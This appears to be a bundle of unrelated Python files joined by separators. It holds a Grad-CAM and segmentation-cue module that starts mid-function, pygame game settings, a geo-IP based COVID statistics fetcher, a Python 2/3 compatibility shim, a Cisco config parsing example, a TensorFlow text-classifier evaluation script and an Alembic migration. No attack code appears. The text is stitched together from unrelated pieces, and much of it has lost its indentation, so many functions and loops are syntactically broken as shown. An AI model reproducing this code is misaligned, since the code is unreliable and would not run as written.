conv_func = K.function([input_model.layers[0].input], [conv_output])
conv_val = conv_func([images])
conv_val = conv_val[0]
cams = np.maximum(np.einsum('ijkl,lm->ijkm', conv_val, weights), 0)
cams = cams[:, :, :, keep_inds]
# Upsample to original size if requested
if should_upsample:
old_cams = cams[:]
cams = np.zeros((old_cams.shape[0], orig_sz[0], orig_sz[1], old_cams.shape[-1]))
for i in range(cams.shape[0]):
for j in range(cams.shape[-1]):
cams[i, :, :, j] = cv2.resize(cams[i, :, :, j], (orig_sz[0], orig_sz[1]))
# Eliminate classes not passing threshold
cams_thresh = cams * np.expand_dims(np.expand_dims(is_pass_threshold, axis=1), axis=2)
return cams_thresh
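# Illustrative pipeline sketch (assumed placeholders: a trained Keras classifier `model`
# and a normalized image batch `img_batch_norm`; the 0.5 score threshold is arbitrary):
#   final_layer = find_final_layer(model)
#   weights = get_grad_cam_weights(model, final_layer, img_batch_norm[:1])
#   scores = model.predict(img_batch_norm)
#   is_pass_threshold = scores > 0.5
#   cams = grad_cam(model, weights, img_batch_norm, is_pass_threshold, final_layer,
#                   keep_inds=np.arange(scores.shape[1]), should_upsample=True)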
def read_batch(img_dir, batch_names, batch_sz, sz, img_mean=[193.09203, 193.09203, 193.02903],
img_std=[56.450138, 56.450138, 56.450138]):
"""Read a batch of images
Parameters
----------
img_dir : str
Directory holding the input images
batch_names : list of str
Filenames of the input images
    batch_sz : int
        The batch size
    sz : list of int
        The 2D size (H, W) at which images are read and resized
img_mean : list of float (size: 3), optional
Three-channel image set mean
img_std : list of float (size: 3), optional
Three-channel image set standard deviation
Returns
-------
img_batch_norm : numpy 4D array (size: B x H x W x 3), B = batch size
Normalized batch of input images
img_batch : numpy 4D array (size: B x H x W x 3), B = batch size
Unnormalized batch of input images
"""
img_mean = np.float64(img_mean)
img_std = np.float64(img_std)
img_batch = np.empty((batch_sz, sz[0], sz[1], 3), dtype='uint8')
for i in range(batch_sz):
tmp = cv2.cvtColor(cv2.imread(os.path.join(img_dir, batch_names[i])), cv2.COLOR_RGB2BGR)
        if tuple(tmp.shape[:2]) != tuple(sz):
            img_batch[i] = cv2.resize(tmp, (sz[0], sz[1]))
        else:
            img_batch[i] = tmp
img_batch_norm = np.zeros_like(img_batch, dtype='float64')
img_batch_norm[:, :, :, 0] = (img_batch[:, :, :, 0] - img_mean[0]) / img_std[0]
img_batch_norm[:, :, :, 1] = (img_batch[:, :, :, 1] - img_mean[1]) / img_std[1]
img_batch_norm[:, :, :, 2] = (img_batch[:, :, :, 2] - img_mean[2]) / img_std[2]
return img_batch_norm, img_batch
def get_fgbg_cues(cues, H_fg, H_bg, class_inds, indices, thresh):
"""Get weak foreground/background cues
Parameters
----------
cues : dict
Weak foreground/background cues, as a dictionary of passing classes and cue locations
H_fg : numpy 4D array (size: B x C x H x W), B = batch size, C = number of classes
Activation maps of foreground network
H_bg : numpy 4D array (size: B x C x H x W), B = batch size, C = number of classes
Activation maps of background network
    class_inds : numpy 1D array (size: B), B = batch size
        Passing class labels for each image in the batch
indices : list (size: B), B = batch size
Image indices in current batch, as a list
thresh: float
Confidence value for thresholding activation maps [0-1]
Returns
-------
cues: dict
Weak foreground/background cues, as a dictionary of passing classes and cue locations
"""
n_seg_classes = H_fg.shape[1] + 1
localization_onehot = np.zeros((H_fg.shape[0], n_seg_classes, H_fg.shape[2], H_fg.shape[3]), dtype='int64')
localization = np.zeros_like(localization_onehot)
# Obtain localization cues
# - Background
for iter_input_image in range(H_bg.shape[0]):
# grad = scipy.ndimage.median_filter(H_bg[iter_input_image], 3)
grad = scipy.ndimage.median_filter(np.sum(H_bg[iter_input_image], axis=0), 3)
thr = np.sort(grad.ravel())[int(0.1 * grad.shape[0] * grad.shape[1])]
localization[iter_input_image, 0] = grad < thr
# - Foreground
for i in range(1, n_seg_classes):
localization[:, i] = H_fg[:, i-1] > thresh * np.max(H_fg[:, i-1])
# Solve overlap conflicts
class_rank = np.argsort(-np.sum(np.sum(localization, axis=-1), axis=-1)) # from largest to smallest masks
localization_ind = np.zeros((H_fg.shape[0], H_fg.shape[2], H_fg.shape[3]), dtype='int64')
img_inds = np.arange(class_rank.shape[0])
for iter_class in range(class_rank.shape[1]):
cur_masks = localization[img_inds, class_rank[:, iter_class]]
localization_ind *= np.int64(cur_masks == 0)
localization_ind += np.expand_dims(np.expand_dims(class_rank[:, iter_class]+1, axis=1), axis=2) * cur_masks
for iter_class in range(class_rank.shape[1]):
localization_onehot[:, iter_class] = localization_ind == (iter_class+1)
# Save true one-hot encoded values
for i,x in enumerate(indices):
cues['%d_labels' % x] = class_inds[i]
cues['%d_cues' % x] = np.array(np.where(localization_onehot[i]))
return cues
def get_fg_cues(cues, H_fg, class_inds, indices, thresh):
"""Get weak foreground cues
Parameters
----------
cues : dict
Weak foreground/background cues, as a dictionary of passing classes and cue locations
H_fg : numpy 4D array (size: B x C x H x W), B = batch size, C = number of classes
Activation maps of foreground network
    class_inds : numpy 1D array (size: B), B = batch size
        Passing class labels for each image in the batch
indices : list (size: B), B = batch size
Image indices in current batch, as a list
thresh: float
Confidence value for thresholding activation maps [0-1]
Returns
-------
cues: dict
Weak foreground/background cues, as a dictionary of passing classes and cue locations
"""
n_seg_classes = H_fg.shape[1]
localization_onehot = np.zeros((H_fg.shape[0], n_seg_classes, H_fg.shape[2], H_fg.shape[3]), dtype='int64')
localization = np.zeros_like(localization_onehot)
# Obtain localization cues
for i in range(n_seg_classes):
localization[:, i] = H_fg[:, i] > thresh * np.max(H_fg[:, i])
# Solve overlap conflicts
class_rank = np.argsort(-np.sum(np.sum(localization, axis=-1), axis=-1)) # from largest to smallest masks
localization_ind = np.zeros((H_fg.shape[0], H_fg.shape[2], H_fg.shape[3]), dtype='int64')
img_inds = np.arange(class_rank.shape[0])
for iter_class in range(class_rank.shape[1]):
cur_masks = localization[img_inds, class_rank[:, iter_class]]
localization_ind *= np.int64(cur_masks == 0)
localization_ind += np.expand_dims(np.expand_dims(class_rank[:, iter_class]+1, axis=1), axis=2) * cur_masks
for iter_class in range(class_rank.shape[1]):
localization_onehot[:, iter_class] = localization_ind == (iter_class+1)
# Save true one-hot encoded values
for i,x in enumerate(indices):
cues['%d_labels' % x] = class_inds[i]
cues['%d_cues' % x] = np.array(np.where(localization_onehot[i]))
return cues
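# Illustrative usage sketch (assumed placeholders: `H_fg` activation maps of shape
# B x C x H x W and `class_inds` holding the passing class labels per image):
#   cues = {}
#   batch_indices = list(range(H_fg.shape[0]))
#   cues = get_fg_cues(cues, H_fg, class_inds, batch_indices, thresh=0.2)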
def get_colours(segset):
"""Obtain class segmentation colours, given the dataset
Parameters
----------
segset : str
The dataset to segment, (i.e. 'ADP-morph', 'ADP-func', 'VOC2012', 'DeepGlobe_train75', or 'DeepGlobe_train37.5')
Returns
-------
(colours) : numpy 1D array of 3-tuples
Class segmentation colours for the given dataset
"""
if segset == 'ADP-morph':
return np.array([(255, 255, 255), (0, 0, 128), (0, 128, 0), (255, 165, 0), (255, 192, 203),
(255, 0, 0), (173, 20, 87), (176, 141, 105), (3, 155, 229),
(158, 105, 175), (216, 27, 96), (244, 81, 30), (124, 179, 66),
(142, 36, 255), (240, 147, 0), (204, 25, 165), (121, 85, 72),
(142, 36, 170), (179, 157, 219), (121, 134, 203), (97, 97, 97),
(167, 155, 142), (228, 196, 136), (213, 0, 0), (4, 58, 236),
(0, 150, 136), (228, 196, 65), (239, 108, 0), (74, 21, 209)])
elif segset == 'ADP-func':
return np.array([(255, 255, 255), (3, 155, 229), (0, 0, 128), (0, 128, 0), (173, 20, 87)])
elif segset == 'VOC2012':
return np.array([(0, 0, 0), (128, 0, 0), (0, 128, 0), (128, 128, 0),
(0, 0, 128), (128, 0, 128), (0, 128, 128), (128, 128, 128),
(64, 0, 0), (192, 0, 0), (64, 128, 0), (192, 128, 0),
(64, 0, 128), (192, 0, 128), (64, 128, 128), (192, 128, 128),
(0, 64, 0), (128, 64, 0), (0, 192, 0), (128, 192, 0),
(0, 64, 128)]) # using palette for pascal voc
elif 'DeepGlobe' in segset:
return np.array([(0, 255, 255), (255, 255, 0), (255, 0, 255), (0, 255, 0), (0, 0, 255),
(255, 255, 255), (0, 0, 0)])
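# Illustrative usage sketch (assumed placeholder `pred_mask`, a 2D array of class indices):
#   palette = get_colours('ADP-func')
#   rgb_mask = palette[pred_mask]  # index the palette to obtain an H x W x 3 colour image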
|
# © 2019 KidsCanCode LLC / All rights reserved.
#honestly not a lot I can put in here, but I'll add more when we add more.
import pygame
# game options/settings
TITLE = "Jumpy!"
WIDTH = 480
HEIGHT = 600
FPS = 60
# Environment options
GRAVITY = 9.8
# Player properties
PLAYER_ACC = 0.5
PLAYER_FRICTION = -0.01
# define colors
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
COLOR = (255, 100, 27)  # RGB channels must stay within 0-255
ORANGE = (255, 69, 0)
OTHERCOOLCOLOR = (45, 0, 60)
LIGHTBLUE = (173, 216, 230)
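# Illustrative usage sketch (assumption: this module is imported as `settings` by the game loop):
#   from settings import WIDTH, HEIGHT, TITLE, FPS
#   screen = pygame.display.set_mode((WIDTH, HEIGHT))
#   pygame.display.set_caption(TITLE)
#   clock = pygame.time.Clock()
#   clock.tick(FPS)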
|
"""To identify the geo and stats"""
import json
import os
import sys
import time
import urllib
import urllib.error
import urllib.parse
import urllib.request
import requests
base_url = "https://freegeoip.app/json/"
class Identify:
# for checking geo and ip
def raw_data(self):
res_1 = urllib.request.urlopen(base_url).read().decode()
res_1 = json.loads(res_1)
return res_1
# Calling Api for fetching stat data
def covid_stats(self):
data = self.raw_data()
country = data["country_name"]
covid_api_url = (
"https://corona.lmao.ninja/v2/countries/{}?yesterday&strict&query".format(
country
)
)
res_stats = requests.get(covid_api_url).content
source_dict = json.loads(res_stats)
cases = source_dict["cases"]
today_cases = source_dict["todayCases"]
deaths, today_deaths, recovered, today_recovered, active, tests = (
source_dict["deaths"],
source_dict["todayDeaths"],
source_dict["recovered"],
source_dict["todayRecovered"],
source_dict["active"],
source_dict["tests"],
)
yield cases, today_cases, deaths, today_deaths, recovered, today_recovered, active, tests
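# Illustrative usage sketch: covid_stats() is a generator that yields a single tuple,
# so next() unpacks it (the run-as-script guard below is an assumption, not part of the API).
if __name__ == "__main__":
    stats = Identify()
    (cases, today_cases, deaths, today_deaths,
     recovered, today_recovered, active, tests) = next(stats.covid_stats())
    print(f"{cases} total cases ({today_cases} today), {active} active, {deaths} deaths")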
|
class Constants:
APP_NAME = "EVOLUTION_CHAMBER"
COMPARISONS_PER_GENERATION = 100
POPULATION_SIZE = 20
KILL_SIZE = 10
|
# coding: utf-8
# pylint: disable=W0611
"""Compatibility layer"""
from __future__ import absolute_import as _abs
import sys
PY3 = (sys.version_info[0] == 3)
def assert_python_min_ver(py2_ver, py3_ver, info_str):
"""Enforce minimum Python version for Python 2.x and 3.x"""
py2_ver_ = py2_ver.split('.')
py3_ver_ = py3_ver.split('.')
if len(py2_ver_) != 2 or len(py3_ver_) != 2 or \
py2_ver_[0] != '2' or py3_ver_[0] != '3':
raise ValueError('Incorrect version format')
if PY3:
if sys.version_info[1] < int(py3_ver_[1]):
raise RuntimeError('Python {} or newer is required. Feature: {}'\
.format(py3_ver, info_str))
else:
if sys.version_info[1] < int(py2_ver_[1]):
raise RuntimeError('Python {} or newer is required. Feature: {}'\
.format(py2_ver, info_str))
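# Illustrative usage sketch (the feature name below is hypothetical):
#   assert_python_min_ver('2.7', '3.5', 'lazy module loading')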
# String handling for Python 2 and 3
if PY3:
STRING_TYPES = (str,)
def py_str(string):
"""Convert C string back to Python string"""
return string.decode('utf-8')
def _str_decode(string):
return string.decode('utf-8')
def _str_encode(string):
return string.encode('utf-8')
else:
STRING_TYPES = (basestring,) # pylint: disable=E0602
def py_str(string):
"""Convert C string back to Python string"""
return string
def _str_decode(string):
return string
def _str_encode(string):
return string
# define DEVNULL
if PY3:
from subprocess import DEVNULL
else:
import os
DEVNULL = open(os.devnull, 'r+b')
__all__ = []
|
#!/usr/bin/env python
""" Example 8
- read cisco config
- print crypto sections with all children
"""
from ciscoconfparse import CiscoConfParse
cfg_parser = CiscoConfParse('cisco_ipsec.txt')
crypto_lines = cfg_parser.find_objects(r'^crypto map CRYPTO')
for cline in crypto_lines:
    print(cline.text)
    for child in cline.children:
        print(child.text)
|
from .vosk import KaldiRecognizer, Model
|
# -*- coding: utf-8 -*-
# Author: XuMing <shibing624@126.com>
# Date: 17/10/16
# Brief: CNN network structure
import csv
import os
import numpy as np
import tensorflow as tf
from tensorflow.contrib import learn
import config
import data_helpers
from util import to_categorical
if config.eval_all_train_data:
x_raw, y = data_helpers.load_data_labels(config.data_dir)
y = to_categorical(y)
y = np.argmax(y, axis=1)
elif config.infer_data_path:
    with open(config.infer_data_path, "r", encoding="utf-8") as f:
        infer_datas = [s.strip() for s in f.readlines()]
x_raw = data_helpers.load_infer_data(infer_datas)
y = []
else:
x_raw = data_helpers.load_infer_data(
["do you think it is right.", "everything is off.", "i hate you .", "it is a bad film.",
"good man and bad person.", "价格不是最便宜的,招商还是浦发银行是238*12=2856.00人家还可以分期的。",
u"驱动还有系统要自装,还有显卡太鸡巴低了.还有装系统太麻烦了"
])
y = [1, 0, 0, 0, 1, 0, 1]
# map data into vocabulary
checkpoint_dir = config.checkpoint_dir
vocab_path = os.path.join(checkpoint_dir, "..", "vocab")
print("vocab_path:", vocab_path)
vocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)
x_test = np.array(list(vocab_processor.transform(x_raw)))
print("\nEvaluating...\n")
checkpoint_file = tf.train.latest_checkpoint(checkpoint_dir)
print("checkpoint file", checkpoint_file)
graph = tf.Graph()
with graph.as_default():
session_conf = tf.ConfigProto(allow_soft_placement=config.allow_soft_placement,
log_device_placement=config.log_device_placement)
sess = tf.Session(config=session_conf)
with sess.as_default():
# load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
# get the placeholders
input_x = graph.get_operation_by_name("input_x").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
# evaluate
predictions = graph.get_operation_by_name("output/predictions").outputs[0]
# generate batches for one epoch
batches = data_helpers.batch_iter(list(x_test), config.batch_size, 1, shuffle=False)
# collect the predictions
all_predictions = []
for x_test_batch in batches:
batch_predictions = sess.run(predictions, {input_x: x_test_batch, dropout_keep_prob: 1.0})
all_predictions = np.concatenate([all_predictions, batch_predictions])
# print accuracy if y_test is defined
if y is not None and len(y) > 0:
correct_predictions = float(sum(all_predictions == y))
print("Total number of test examples: {}".format(len(y)))
print("Accuracy: {:g}".format(correct_predictions / float(len(y))))
# save the evaluation to csv
x_raw = [x.encode("utf-8") for x in x_raw]
predictions_human_readable = np.column_stack((np.array(x_raw), all_predictions))
out_path = os.path.join(checkpoint_dir, "..", "prediction.csv")
print("Saving evaluation to {0}".format(out_path))
print(predictions_human_readable)
        with open(out_path, "w") as f:
csv.writer(f).writerows(predictions_human_readable)
|
"""adding more reasons for clustering
Revision ID: 256acb048a32
Revises: e2d7db861709
Create Date: 2017-07-31 11:49:16.345244
"""
from alembic import op
import sqlalchemy as sa
revision = '256acb048a32'
down_revision = 'e2d7db861709'
branch_labels = None
depends_on = None
enum_fields = ['status_code_304', 'etag', 'etag_calculated']
def upgrade():
from sqlalchemy.dialects import postgresql
postgresql.ENUM(*enum_fields, name='cachereason')\
.create(op.get_bind())
op.add_column('feed', sa.Column('cache_support_a_im', sa.Boolean,
nullable=False, server_default='FALSE'))
op.add_column('feed', sa.Column('cache_type',
sa.Enum(*enum_fields, name='cachereason'),
nullable=True))
    op.add_column('article', sa.Column('cluster_tfidf_neighbor_size',
sa.Integer(), nullable=True))
op.add_column('article', sa.Column('cluster_tfidf_with',
sa.Integer(), nullable=True))
def downgrade():
with op.batch_alter_table('feed') as batch_op:
batch_op.drop_column('cache_type')
batch_op.drop_column('cache_support_a_im')
with op.batch_alter_table('article') as batch_op:
batch_op.drop_column('cluster_tfidf_with')
batch_op.drop_column('cluster_tfidf_neighbor_size')
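# Illustrative usage (standard Alembic CLI, not part of this revision file):
#   alembic upgrade 256acb048a32     # apply this migration
#   alembic downgrade e2d7db861709   # revert to the previous revision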
|